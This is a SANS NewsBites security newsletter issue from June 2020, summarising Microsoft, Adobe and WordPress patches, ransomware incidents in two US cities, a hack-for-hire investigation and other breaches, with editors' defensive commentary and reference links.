SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume XXII - Issue #47
June 12, 2020Microsoft, Adobe, WordPress Issue Critical Patches -- Enterprises Falling Behind On Installing Them
****************************************************************************
SANS NewsBites June 12, 2020 Vol. 22, Num. 047
****************************************************************************
TOP OF THE NEWS
Microsoft Patch Tuesday
Microsoft Releases Fix for Vulnerability in Windows Group Policy
Adobe Releases Fixes for Flaws in Multiple Products
WordPress 5.4.2 Patches More Vulnerabilities
REST OF THE NEWS
Alabama City Says it Will Pay US $300,000 Ransomware Demand
Citizen Lab Says Dark Basin Hacking-for-Hire Group Has Ties to Indian Company
A1 Telekom (Austria) Breach
Cryptominer Campaign Targets Misconfigured Kubeflow Toolkit
Updated Specification Available for Universal Plug-and-Play Protocol Vulnerability
Senate Report: Chinese Telecoms Were Allowed to Operate in US with Minimal Oversight
US Military and Federal Law Enforcement Agencies Have Purchased New IMSI-Catchers
Knoxville City Systems Hit With Ransomware Attack
INTERNET STORM CENTER TECH CORNER
****************** Sponsored By Amazon Web Services, Inc. *******************
June 18, 2020 @ 2:00 EDT | Join Sounil Yu and AWS Marketplace to learn how you can better understand your sensitive data, including its location, configuration, and access privileges. Having the ability to identify and secure sensitive workloads through visibility layers and controls helps strengthen that understanding as well as your overall security posture. | http://www.sans.org/info/216685
*****************************************************************************
CYBERSECURITY TRAINING UPDATE
SANS Training is 100% Online, with two convenient ways to complete a course:
OnDemand | Live Online
- https://www.sans.org/ondemand/
- https://www.sans.org/live-online
Keep your skills sharp with SANS Online Training:
The worlds top cybersecurity courses
Taught by real world practitioners
Ideal preparation for more than 30 GIAC Certifications
Take advantage of the current promotional offer
Get a Free GIAC Certification Attempt or Take $350 Off with OnDemand or Live Online Training through June 24
https://www.sans.org/online-security-training/specials/
Top OnDemand Courses
SEC401: Security Essentials Bootcamp Style
- https://www.sans.org/ondemand/course/security-essentials-bootcamp-style
SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling
- https://www.sans.org/ondemand/course/hacker-techniques-exploits-incident-handling
SEC560: Network Penetration Testing and Ethical Hacking
- https://www.sans.org/ondemand/course/network-penetration-testing-ethical-hacking
______________________
Upcoming In Person and Live Online Events:
2-Day Firehose Training | June 29-30 | Live Online
- https://www.sans.org/event/2-day-firehose-training-jun29-2020
SANS Summer of Cyber | July 6-17 | Live Online
- https://www.sans.org/event/summer-of-cyber-jul-6
DFIR Summit & Training | July 16-25 | Live Online
- https://www.sans.org/event/digital-forensics-summit-2020
SANS Network Security 2020 | September 20-25 | Las Vegas, NV or Live Online
- https://www.sans.org/event/network-security-2020
______________________
Test drive a course: https://www.sans.org/course-preview
View the full SANS course catalog and skills roadmap.
- https://www.sans.org/courses
- https://www.sans.org/cyber-security-skills-roadmap
*****************************************************************************
TOP OF THE NEWS
--Microsoft Patch Tuesday
(June 9 & 10, 2020)
On Tuesday, June 9, Microsoft released fixes for 129 security issues in multiple products. This is the fourth month in a row that Microsoft has fixed more than 100 vulnerabilities in its scheduled security updates. The patches include a fix for a critical remote code execution vulnerability in the Server Message Block (SMB) v1 protocol. Microsoft also released fixes for two other vulnerabilities in SMBv3.
[Editor Comments]
[Pescatore] In the current environment, two important points: (1) The NewsBites item last week about Rapid7 discovering over 80% of Microsoft Exchange servers had not installed a February critical patch indicates that IT operations may not be focusing on server patching while IT staff is working from home, and (2) Employees working at home from their own PCs should be reminded to make sure auto update is on and that these mega-patch releases are being successfully installed.
[Ullrich] Microsoft moved away from SMBv1 and introduced SMBv2 to reduce some of the attack surface created by many no-longer-used legacy features. In SMBv3, Microsoft started adding features like compression but apparently didnt learn from past mistakes and ended up with now three vulnerabilities that can be devastating if combined. In the end, the old rule still applies: Never allow SMB to pass your perimeter, and closely monitor SMB traffic internally. In March, we had SMBGhost (CVE-2020-0796). SMBGhost is a remote code execution vulnerability, but it is difficult to exploit, and it took until May for a working PoC exploit to be released publicly. This month, Microsoft patched another vulnerability in the exact same feature of SMBv3. SMBleed (CVE-2020-1206) sounds less severe at first, only allowing for information disclosure. But the information disclosed is Kernel memory, and paired with SMBGhost for privilege escalation, SMBleed can lead to devastating attacks. And finally, yes, we got another RCE in SMBv1 (SMBLost, CVE-2020-1301). But SMBv1 should have been disabled a long time ago.
[Neely] On the heels of making sure the patch for SBMGhost was applied, MS releases added SMB fixes. While SMB is contained within the traditional corporate perimeter, the current work environment may not be as well contained, so timely patching is essential. As John reminds us, our environment is further complicated by personally owned systems which also need to be kept updated. Where possible, incorporate patch checking into your VPN posture check. Be sure to let users know the enforcement timeline and expectations around attempted use of an unpatched system.
[Murray] For the moment and for most enterprises "patching" remains mandatory; failing to do so not only puts one at risk but puts one's neighbors at risk. At what point do we decide that the cost of patching is too high? When do we realize that the attack surface of these widely used products is so big, so homogenous, and so porous, that collectively they weaken the entire infrastructure? When do we realize that the architectures (e.g., von Neumann), languages, and development processes that we are using are fundamentally flawed? That hiding these products behind local firewalls and end-to-end application layer encryption is a more efficient strategy? When do we acknowledge that we must fundamentally reform how we build, buy, pay for, and use both hardware and software? At what point do we admit that we cannot patch our way to security?
Read more in:
SANS: Microsoft June 2020 Patch Tuesday
https://isc.sans.edu/forums/diary/Microsoft+June+2020+Patch+Tuesday/26220/
KrebsOnSecurity: Microsoft Patch Tuesday, June 2020 Edition
https://krebsonsecurity.com/2020/06/microsoft-patch-tuesday-june-2020-edition/
The Register: June's Patch Tuesday reveals 23 ways to remotely pwn Windowsand over 100 more bugs that could ruin your day
https://www.theregister.com/2020/06/09/june_2020_patch_tuesday/
ZDNet: Microsoft June 2020 Patch Tuesday fixes 129 vulnerabilities
https://www.zdnet.com/article/microsoft-june-2020-patch-tuesday-fixes-129-vulnerabilities/
Dark Reading: Microsoft Fixes 129 Bugs in Largest Patch Tuesday Release
DUO: Critical Flaw Patched in Windows SMB
https://duo.com/decipher/critical-flaw-patched-in-windows-smb
--Microsoft Releases Fix for Vulnerability in Windows Group Policy
(June 9 & 10, 2020)
One of the issues Microsoft patched in its scheduled monthly security update is a privilege elevation flaw in Windows Group Policy. CyberArk discovered the vulnerability and notified Microsoft more than a year ago; the issue affects all currently supported versions of Windows.
[Editor Comments]
[Neely] The fix to CVE-2020-1317 is included in this months patches from Microsoft. CyberArk characterized this vulnerability as easy to exploit once logged into the system; Microsoft claims specialized software is also needed. Either way, applying this months update solves the problem.
Read more in:
CyberArk: Group Policies Going Rogue
https://www.cyberark.com/resources/threat-research-blog/group-policies-going-rogue
ZDNet: Windows 10: Microsoft patches 'important' Windows Group Policy bug reported a year ago
Bleeping Computer: Windows Group Policy flaw lets attackers gain admin privileges
--Adobe Releases Fixes for Flaws in Multiple Products
(June 9, 2020)
Adobe has released fixes for security issues in Flash Player, Experience Manager, and Framemaker. In all, the updates address 10 vulnerabilities. Four of the vulnerabilities are rated critical; they could be exploited to remotely execute code on unpatched systems. Three of the critical flaws, memory corruption and out-of-bounds write vulnerabilities, affect Framemaker; the fourth, a use after free vulnerability, affects Flash Player.
[Editor Comments]
[Pescatore] Another one to remind work-at-home employees to patch, with an additional caveat: Adobe and McAfee continue to try to persuade Adobe software users to install McAfee software as part of the Adobe patching process. Users should be told explicitly to not just click yes on Adobe update requests. Hard to believe this Adobe/McAfee deal continuesimagine if Band Aids tried to trick users into signing up for home alarm services
[Neely] I still get an occasional prompt to enable Flash to view content, so I just checked: the Flash end-of-life date is still December 31, 2020, so you need to keep it updated where its still being used. Make sure that the plans to retire Flash-based content, or provide an isolated browser for using it, are still completing this year.
Read more in:
Threatpost: Adobe Warns of Critical Flaws in Flash Player, Framemaker
https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/
Bleeping Computer: Adobe fixes critical remote code execution bug in Flash Player
Adobe: Adobe Security Bulletins and Advisories
https://helpx.adobe.com/security.html
--WordPress 5.4.2 Patches More Vulnerabilities
(June 11, 2020)
WordPress has released version 5.4.2 of its content management system. The new version addresses a number of security issues, including six vulnerabilities that could be exploited by cross-site scripting attacks. The update is a security and maintenance release; WordPress plans to release its next major update, WordPress 5.5, in August 2020.
Read more in:
Portswigger: WordPress security release addresses multiple XSS vulnerabilities
https://portswigger.net/daily-swig/wordpress-security-release-addresses-multiple-xss-vulnerabilities
WordPress: WordPress 5.4.2 Security and Maintenance Release
https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
**************************** SPONSORED LINKS ******************************
1) SANS Survey | Survey closes on June 24th. Share your perception of the use of firewalls inside the modern enterprise and how your organization is using firewalls: http://www.sans.org/info/216690
2) Digital Forensics Solutions Forum | July 17, 2020 @ 9:00 am EDT | SANS is convening an inaugural forum for DFIR solutions featuring case studies from vetted solution providers who support investigations across a wide range of scenarios: http://www.sans.org/info/216695
3) Webcast | Join Tim Conway, Peter Newton and Christopher Blauvelt as they discuss how to use "NERC CIP: An Overview of the Standards" | June 18, 2020 @ 10:30am EDT | http://www.sans.org/info/216700
*****************************************************************************
THE REST OF THE WEEKS NEWS
--Alabama City Says it Will Pay US $300,000 Ransomware Demand
(June 9 & 11, 2020)
The city of Florence, Alabama plans to pay nearly $300,000 in bitcoin to ransomware operators to prevent citizens data from being exposed. On May 26, Brian Krebs called the mayors office to let them know that ransomware operators had gained a foothold in the citys systems. On Friday, June 5, the citys mayor acknowledged that the city email system system was shut down due to a cyberattack, and earlier this week, the mayor confirmed to Krebs that Florences systems had been infected by DoppelPaymer ransomware. The Florence city council unanimously approved the decision to pay the ransom.
[Editor Comments]
[Neely] With ransomware operators offering purloined information for sale reminiscent of an eBay auction, its a good time to revisit your decision process regarding ransom payment as well as making sure you know what information resides in which locations so you can characterize affected data and respond appropriately if necessary.
[Murray] Three years in, all municipalities and healthcare institutions are responsible for knowing that they are targets of extortion attacks and for having a plan for resisting and mitigating such attacks. While paying ransom may, in at least some cases, be an appropriate part of such a plan, such a plan must have been made in advance of the attack, not simply as a convenient and expensive response to it.
Read more in:
KrebsOnSecurity: Florence, Ala. Hit By Ransomware 12 Days After Being Alerted by KrebsOnSecurity
APR: Alabama city to pay $300,000 ransom in computer system hack
https://www.apr.org/post/alabama-city-pay-300000-ransom-computer-system-hack
--Citizen Lab Says Dark Basin Hacking-for-Hire Group Has Ties to Indian Company
(June 9, 2020)
Researchers with the Citizen Lab Internet watchdog group say that a hacking-for-hire group it has dubbed Dark Basin has ties to BellTroX InfoTech Services, a company based in India. Dark Basin has targeted thousands of people and organizations around the world over the past seven years. Dark Basins targets include journalists, nonprofits, advocacy groups, and commercial organizations.
Read more in:
Citizen Lab: Dark Basin | Uncovering a Massive Hack-For-Hire Operation
https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/
Reuters: Exclusive: Obscure Indian cyber firm spied on politicians, investors worldwide
Dark Reading: Hack-for-Hire Firm Connected to Attacks on Nonprofits, Journalists
Ars Technica: Hackers for hire targeted hundreds of institutions, says report
The Register: Researchers unmask Indian 'infosec' firm to reveal hacker-for-hire op that targeted pretty much anyone clients wanted
https://www.theregister.com/2020/06/09/citizen_lab_indian_hackers/
Threatpost: Dark Basin Hack-For-Hire Group Targeted Thousands Over 7 Years
https://threatpost.com/dark-basin-hack-hire-group/156407/
Cyberscoop: Vast hack-for-hire scheme against activists, corporate targets tied to Indian IT firm
https://www.cyberscoop.com/dark-basin-citizen-lab-belltrox-exxon-mobile-hacking/
--A1 Telekom (Austria) Breach
(June 8 & 11, 2020)
A1 Telekom, Austrias largest Internet service provider, has acknowledged a security breach that occurred in November 2019. The company says it detected the breach in December 2019, but that it took them until May 22, 2020 to fully mitigate the situation. All employee passwords have been reset, as have passwords and access keys for all servers.
Read more in:
ZDNet: Hackers breached A1 Telekom, Austria's largest ISP
https://www.zdnet.com/article/hackers-breached-a1-telekom-austrias-largest-isp/
Heise: Massive attack on A1 Telekom Austria (German)
https://www.heise.de/hintergrund/Massiver-Angriff-auf-A1-Telekom-Austria-4775451.html
--Cryptominer Campaign Targets Misconfigured Kubeflow Toolkit
(June 10 & 11, 2020)
Microsofts Azure Security Center recently detected a cryptominer campaign that is targeting misconfigured Kubeflow instances. If users changed the default settings, they could have exposed the Kubeflow admin panel on the Internet. The attackers appear to have been scanning for these misconfigured instances and exploiting them to install Monero cryptojacking malware.
Read more in:
Microsoft: Misconfigured Kubeflow workloads are a security risk
Threatpost: Kubernetes Falls to Cryptomining via Machine-Learning Framework
https://threatpost.com/kubernetes-cryptomining-machine-learning-framework/156481/
ZDNet: Microsoft discovers cryptomining gang hijacking ML-focused Kubernetes clusters
--Updated Specification Available for Universal Plug-and-Play Protocol Vulnerability
(June 9 & 11 , 2020)
A flaw in the Universal Plug-and-Play Protocol (UPnP) protocol could be exploited to launch distributed denial-of-service (DDoS) attacks, exfiltrate data, and scan internal ports. Dubbed CallStranger by the researchers who created proof-of-concept exploit code, the issue affects billions of Internet of Things (IoT) devices. An updated specification is available.
[Editor Comments]
[Neely] Dont expose UPnP devices to the Internet. Know what UPnP devices you have and what they can access. Paul Asadoorian of Security Weekly gave me this reference on discovering UPnP devices on your network using Nmap or the miranda-upnp python package: https://charlesreid1.com/wiki/Nmap/UPnP.
Read more in:
DUO: Flaw in Plug-and-Play Protocol Exposes Devices to Data Theft, DDoS Attacks
https://duo.com/decipher/flaw-in-plug-and-play-protocol-exposes-devices-to-data-theft-ddos-attacks
Ars Technica: UPnP flaw exposes millions of network devices to attacks over the Internet
Dark Reading: Vulnerability in Plug-and-Play Protocol Puts Billions of Devices at Risk
CERT: Universal Plug and Play (UPnP) SUBSCRIBE can be abused to send traffic to arbitrary destinations
https://kb.cert.org/vuls/id/339275
--Senate Report: Chinese Telecoms Were Allowed to Operate in US with Minimal Oversight
(June 9, 2020)
A staff report from the US Senates Permanent Subcommittee on Investigations found that the Federal Communications Commission (FCC) and other US agencies failed to adequately oversee Chinese telecommunications companies operating in the US for more nearly 20 years. The report notes that the team of officials from the Departments of Justice, Homeland Security, and Defense who were supposed to monitor the Chinese-owned carriers had scant resources and no statutory authority.
[Editor Comments]
[Pescatore] Over this same time frame, back in 2003 British Telecom selected Huawei for the UK national network upgrade, and the British government dedicated resources to (and required Huawei to help fund) the Huawei Cyber Security Evaluation Centre to test all software and firmware from Huawei before allowing in on production systems. The UK has mitigated the risk successfully for 17 years with that supply chain security approach.
Read more in:
Senate: Portman, Carper: Bipartisan Report Reveals How Three Chinese Government-Owned Telecoms Operated in the U.S. for Nearly 20 Years with Little-to-No Oversight from the Federal Government
HSGAC: Threats to U.S. Networks: Oversight of Chinese Government-Owned Carriers (PDF)
Ars Technica: FCC failed to monitor Chinese telecoms for almost 20 years: Senate report
Cyberscoop: Shoddy US government review of Chinese telcos endangered national security, Senate panel finds
https://www.cyberscoop.com/chinese-telecommunications-national-security-team-telecom-senate/
FNN: Investigation finds interagency group lacked authority to oversee Chinese telecom companies
GovInfosecurity: Senate Report: Chinese Telecoms Operated Without Oversight
https://www.govinfosecurity.com/senate-report-chinese-telecoms-operated-without-oversight-a-14409
--US Military and Federal Law Enforcement Agencies Have Purchased New IMSI-Catchers
(May 27 & June 8, 2020)
The American Civil Liberties Union (ACLU) has obtained documents under the Freedom of Information ACT (FoIA) showing that the US Immigration and Customs Enforcement (ICE) had purchased upgraded IMSI-catcher devices known as Crossbows. The technology, which is made by the same company that makes Stingray IMSI-catchers, appears to target 4G mobile devices. Motherboard has found that other US military and federal law enforcement agencies have also purchased Crossbows.
Read more in:
Vice: Agencies Spending Millions on 'Crossbow' Spy Tech, an Upgraded Stingray
https://www.vice.com/en_us/article/jgxm3g/crossbow-imsi-catcher-new-stingray
ACLU: ICE Records Confirm that Immigration Enforcement Agencies are Using Invasive Cell Phone Surveillance Devices
--Knoxville City Systems Hit With Ransomware Attack
(June 11, 2020)
The city of Knoxville, Tennessee, was the target of a ransomware attack this week. The city has shut down its IT network. By the time the attack was detected early in the morning of Thursday, June 11, multiple systems had been encrypted. Emergency services have not been impacted by the attack.
Read more in:
Ars Technica: Knoxville shuts down parts of its network after being hit by ransomware
ZDNet: Knoxville shuts down IT network following ransomware attack
https://www.zdnet.com/article/knoxville-shuts-down-it-network-following-ransomware-attack/
SC Magazine: Knoxville ransomware attack shutters parts of city website
*****************************************************************************
INTERNET STORM CENTER TECH CORNER
Microsoft Patch Day
https://isc.sans.edu/forums/diary/Microsoft+June+2020+Patch+Tuesday/26220/
SMBleed
https://github.com/ZecOps/CVE-2020-1206-POC
Anti-Debugging JavaScript Techniques
https://isc.sans.edu/forums/diary/AntiDebugging+JavaScript+Techniques/26228/
Job Application Themed Malspam Pushes ZLoader
https://isc.sans.edu/forums/diary/Job+applicationthemed+malspam+pushes+ZLoader/26222/
Adobe Patches
https://helpx.adobe.com/security.html
Intel Patch Day
More Expiring Root CAs
https://scotthelme.co.uk/impending-doom-root-ca-expiring-legacy-clients/
Black Lives Matter Themed Malware
Facebook Messenger Desktop App Vulnerability
https://blog.reasonsecurity.com/2020/06/11/persistence-method-using-facebook-messenger-desktop-app/
Outlook Massmailing Macros
https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
STI Student Research: Dennis Taggard; Ebb and Flow: Network Flow Logging as a Staple of Public Cloud Visibility or a Waning Imperative?
Video: https://youtu.be/faoFx7Q3_aM
*****************************************************************************
The Editorial Board of SANS NewsBites
John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.
Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.
Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.
Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.
Mark Weatherford is Global Information Security Strategist for Booking Holdings and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.
Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.
Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.
William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.
Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.
Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).
Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.
Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.
David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.
Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.
Alan Paller is director of research at the SANS Institute.
Brian Honan is an independent security consultant based in Dublin, Ireland.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create